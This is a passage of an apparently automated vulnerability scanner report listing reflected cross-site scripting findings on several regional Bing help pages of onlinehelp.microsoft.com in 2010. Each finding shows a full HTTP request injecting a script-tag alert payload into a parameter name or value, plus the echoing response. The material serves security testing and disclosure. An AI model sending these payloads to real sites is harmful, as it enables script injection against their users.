Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-AU/bing/ff808535(en-AU).aspx?e969d"><script>alert(1)</script>54244c5efaa=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:39 GMT
Content-Length: 43099


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-au/bing/ff808535.aspx?e969d"><script>alert(1)</script>54244c5efaa=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.11. http://onlinehelp.microsoft.com/en-CA/bing/ff808535(en-CA).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-CA/bing/ff808535(en-CA).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0528"><script>alert(1)</script>7ef69361ab0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-CA/bing/ff808535(en-CA).aspx?a0528"><script>alert(1)</script>7ef69361ab0=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:38 GMT
Content-Length: 39667


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/en-ca/bing/ff808535.aspx?a0528"><script>alert(1)</script>7ef69361ab0=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.12. http://onlinehelp.microsoft.com/en-GB/bing/ff808535(en-GB).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-GB/bing/ff808535(en-GB).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5ed3"><script>alert(1)</script>d345dabf2cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-GB/bing/ff808535(en-GB).aspx?f5ed3"><script>alert(1)</script>d345dabf2cd=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:04:50 GMT
Content-Length: 39665


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/en-gb/bing/ff808535.aspx?f5ed3"><script>alert(1)</script>d345dabf2cd=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.13. http://onlinehelp.microsoft.com/en-IE/bing/ff808535(en-IE).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-IE/bing/ff808535(en-IE).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c944d"><script>alert(1)</script>c4cb98108c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-IE/bing/ff808535(en-IE).aspx?c944d"><script>alert(1)</script>c4cb98108c6=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:44 GMT
Content-Length: 44096


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-ie/bing/ff808535(en-us).aspx?c944d"><script>alert(1)</script>c4cb98108c6=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.14. http://onlinehelp.microsoft.com/en-IN/bing/ff808535(en-IN).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-IN/bing/ff808535(en-IN).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"><script>alert(1)</script>61148468d6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-IN/bing/ff808535(en-IN).aspx?f1532"><script>alert(1)</script>61148468d6d=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:37 GMT
Content-Length: 44094


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-in/bing/ff808535(en-us).aspx?f1532"><script>alert(1)</script>61148468d6d=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.15. http://onlinehelp.microsoft.com/en-MY/bing/ff808535(en-MY).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-MY/bing/ff808535(en-MY).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 397ec"><script>alert(1)</script>ba17b6e6830 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-MY/bing/ff808535(en-MY).aspx?397ec"><script>alert(1)</script>ba17b6e6830=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:39 GMT
Content-Length: 44097


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-my/bing/ff808535(en-us).aspx?397ec"><script>alert(1)</script>ba17b6e6830=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.16. http://onlinehelp.microsoft.com/en-NZ/bing/ff808535(en-NZ).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-NZ/bing/ff808535(en-NZ).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a424a"><script>alert(1)</script>c6ea71e9f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-NZ/bing/ff808535(en-NZ).aspx?a424a"><script>alert(1)</script>c6ea71e9f1=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:43 GMT
Content-Length: 38606


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/en-nz/bing/ff808535.aspx?a424a"><script>alert(1)</script>c6ea71e9f1=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.17. http://onlinehelp.microsoft.com/en-PH/bing/ff808535(en-PH).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-PH/bing/ff808535(en-PH).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 339f8"><script>alert(1)</script>5da07e5a64c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-PH/bing/ff808535(en-PH).aspx?339f8"><script>alert(1)</script>5da07e5a64c=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:57 GMT
Content-Length: 44100


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-ph/bing/ff808535(en-us).aspx?339f8"><script>alert(1)</script>5da07e5a64c=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.18. http://onlinehelp.microsoft.com/en-SG/bing/ff808535(en-SG).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-SG/bing/ff808535(en-SG).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f4a0"><script>alert(1)</script>18dd6e4b7e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-SG/bing/ff808535(en-SG).aspx?3f4a0"><script>alert(1)</script>18dd6e4b7e5=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:04:13 GMT
Content-Length: 44098


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-sg/bing/ff808535(en-us).aspx?3f4a0"><script>alert(1)</script>18dd6e4b7e5=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.19. http://onlinehelp.microsoft.com/en-US/bing/ff808535(en-US).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535(en-US).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c17b9"><script>alert(1)</script>eee2a898004 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535(en-US).aspx?c17b9"><script>alert(1)</script>eee2a898004=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:22 GMT
Content-Length: 43681


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?c17b9"><script>alert(1)</script>eee2a898004=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.20. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [48d04">0d1903e336d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The value of the 48d04"><script>alert(1)</script>0d1903e336d request parameter is copied into the HTML document as plain text between tags. The payload f0b48<script>alert(1)</script>2daaf949322 was submitted in the 48d04"><script>alert(1)</script>0d1903e336d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?48d04"><script>alert(1)</script>0d1903e336d=1f0b48<script>alert(1)</script>2daaf949322 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: onlinehelp.microsoft.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABPCgAAF+xvBC5OASWj/3mgVMXDNA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 15:09:48 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 15:09:49 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:09:48 GMT
Content-Length: 47518


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
</script>0d1903e336d=1f0b48<script>alert(1)</script>2daaf949322" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.21. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48d04"><script>alert(1)</script>0d1903e336d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?48d04"><script>alert(1)</script>0d1903e336d=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADECQAAYTeSXmFJ7YC9HxaAJkaNeA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 01:02:43 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 01:02:43 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 01:02:43 GMT
Content-Length: 43681


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?48d04"><script>alert(1)</script>0d1903e336d=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.22. http://onlinehelp.microsoft.com/en-ZA/bing/ff808535(en-ZA).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-ZA/bing/ff808535(en-ZA).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 357db"><script>alert(1)</script>0506a896fb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-ZA/bing/ff808535(en-ZA).aspx?357db"><script>alert(1)</script>0506a896fb7=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:04:18 GMT
Content-Length: 44101


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-za/bing/ff808535(en-us).aspx?357db"><script>alert(1)</script>0506a896fb7=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.23. http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx [48d04%22%3E%3Cscript%3Ealert(1)%3C/script%3E0d1903e336d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808535.aspx

Issue detail

The value of the 48d04%22%3E%3Cscript%3Ealert(1)%3C/script%3E0d1903e336d request parameter is copied into the HTML document as plain text between tags. The payload 61f17<script>alert(1)</script>4ee35bfebd2 was submitted in the 48d04%22%3E%3Cscript%3Ealert(1)%3C/script%3E0d1903e336d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/bing/ff808535.aspx?48d04%22%3E%3Cscript%3Ealert(1)%3C/script%3E0d1903e336d=161f17<script>alert(1)</script>4ee35bfebd2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: onlinehelp.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAACeCAAAFoZu0+hCWRtU8kCtbBVONA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 15:09:12 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 15:09:13 GMT; path=/
